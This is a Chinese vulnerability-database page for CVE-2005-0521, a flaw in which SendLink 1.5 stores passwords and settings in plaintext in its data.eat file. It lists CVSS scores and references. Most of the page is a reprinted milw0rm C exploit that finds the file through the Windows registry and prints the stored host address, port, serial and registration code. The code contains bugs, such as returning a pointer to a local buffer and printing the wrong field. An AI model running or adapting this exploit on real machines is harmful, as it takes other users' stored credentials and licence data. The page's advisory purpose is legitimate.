CVE-2005-0521
CVSS2.1
发布时间 :2005-02-23 00:00:00
修订时间 :2008-09-05 16:46:32
NMCOE    

[原文]SendLink 1.5 stores sensitive information, possibly including passwords, in plaintext in the data.eat file, which allows local users to gain privileges.


[CNNVD]SendLink data.eat文件敏感信息泄露漏洞(CNNVD-200502-088)

        SendLink是一款小巧便捷的网络共享软件。
        SendLink 1.5将可能包含密码在内的敏感信息以纯文本格式存储在data.eat文件中,这可让本地用户获取特权。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0521
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0521
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-088
(官方数据源) CNNVD

- 其它链接及资源

http://securitytracker.com/id?1013269
(VENDOR_ADVISORY)  SECTRACK  1013269

- 漏洞信息

SendLink data.eat文件敏感信息泄露漏洞
低危 未知
2005-02-23 00:00:00 2005-10-20 00:00:00
本地  
        SendLink是一款小巧便捷的网络共享软件。
        SendLink 1.5将可能包含密码在内的敏感信息以纯文本格式存储在data.eat文件中,这可让本地用户获取特权。

- 公告与补丁

        

- 漏洞信息 (835)

SendLink 1.5 Local Password Disclosure Exploit (EDBID:835)
windows local
2005-02-22 Verified
0 Kozan
N/A [点击下载]
/*****************************************************************

SendLink v1.5 Local Exploit by Kozan

Application: SendLink v1.5
Vendor:Computer Knacks
http://www.computerknacks.com/

Vulnerable Description: SendLink v1.5 discloses passwords to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <windows.h>
#include <stdio.h>
#include <string.h>

#define BUFSIZE 100
HKEY hKey;
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

char *hostip, *hostname, *serial, *options, *regcode, *hostport;

int adresal(char *FilePath,char *Str)
{
      char kr;
      int Sayac=0;
      int Offset=-1;
      FILE *di;
      di=fopen(FilePath,"rb");

      if( di == NULL )
      {
              fclose(di);
              return -1;
      }

      while(!feof(di))
      {
              Sayac++;
              for(int i=0;i<strlen(Str);i++)
              {
                      kr=getc(di);
                      if(kr != Str[i])
                      {
                              if( i>0 )
                              {
                                      fseek(di,Sayac+1,SEEK_SET);
                              }
                              break;
                      }
                      if( i > ( strlen(Str)-2 ) )
                      {
                              Offset = ftell(di)-strlen(Str);
                              fclose(di);
                              return Offset;
                      }
              }
      }
      fclose(di);
      return -1;
}

char *oku(char *FilePath,char *Str)
{

      FILE *di;
      char cr;
          char BB = 0xBB;
      int i=0;
      char Feature[500];

      int Offset = adresal(FilePath,Str);

      if( Offset == -1 )
              return "";

      if( (di=fopen(FilePath,"rb")) == NULL )
              return "";

      fseek(di,Offset+strlen(Str),SEEK_SET);

      while(!feof(di))
      {
              cr=getc(di);
              if(cr == BB)
                          break;

              Feature[i] = cr;
              i++;
      }

      Feature[i] = '\0';
      fclose(di);
      return Feature;
}

int main(void)
{
       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                  "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                  0,
                  KEY_QUERY_VALUE,
                  &hKey) == ERROR_SUCCESS)
       {

               lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
                                                               (LPBYTE)
prgfiles, &dwBufLen);

               if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
               {
                       RegCloseKey(hKey);
           printf("An error occured!\n");
                       return 0;
               }

      RegCloseKey(hKey);

       }
       else
   {
               RegCloseKey(hKey);
       printf("An error occured!\n");
               return 0;
       }

       strcat(prgfiles,"\\SendLink\\User\\data.eat");

       printf("SendLink v1.5 Local Exploit by Kozan\n");
       printf("Credits to ATmaCA\n");
       printf("www.netmagister.com  -  www.spyinstructors.com \n\n");

       try
       {
               char hostip_temp[BUFSIZE];
               wsprintf(hostip_temp,"hostip%c=%c",0xBB,0xAB);
               hostip=oku(prgfiles,hostip_temp);
               printf("Host IP: %s\n",hostip);

               char hostname_temp[BUFSIZE];
               wsprintf(hostname_temp,"hostname%c=%c",0xBB,0xAB);
               hostname=oku(prgfiles,hostname_temp);
               printf("Hostname                        : %s\n",hostname);

               char hostport_temp[BUFSIZE];
               wsprintf(hostport_temp,"hostport%c=%c",0xBB,0xAB);
               hostport=oku(prgfiles,hostport_temp);
               printf("Host Port                        : %s\n",hostport);

               char options_temp[BUFSIZE];
               wsprintf(options_temp,"options%c=%c",0xBB,0xAB);
               options=oku(prgfiles,options_temp);
               printf("Options                                : %s\n",options);

               char serial_temp[BUFSIZE];
               wsprintf(serial_temp,"serial%c=%c",0xBB,0xAB);
               serial=oku(prgfiles,serial_temp);
               printf("Serial                                : %s\n",hostip);

               char regcode_temp[BUFSIZE];
               wsprintf(regcode_temp,"regcode%c=%c",0xBB,0xAB);
               regcode=oku(prgfiles,regcode_temp);
               printf("Registration Code        : %s\n",regcode);

       }catch(...){ printf("An error occured!\n"); return 0; }

       return 0;

}

// milw0rm.com [2005-02-22]
		

- 漏洞信息

14140
SendLink data.eat Local Password Disclosure
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-23 Unknow
2005-02-23 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站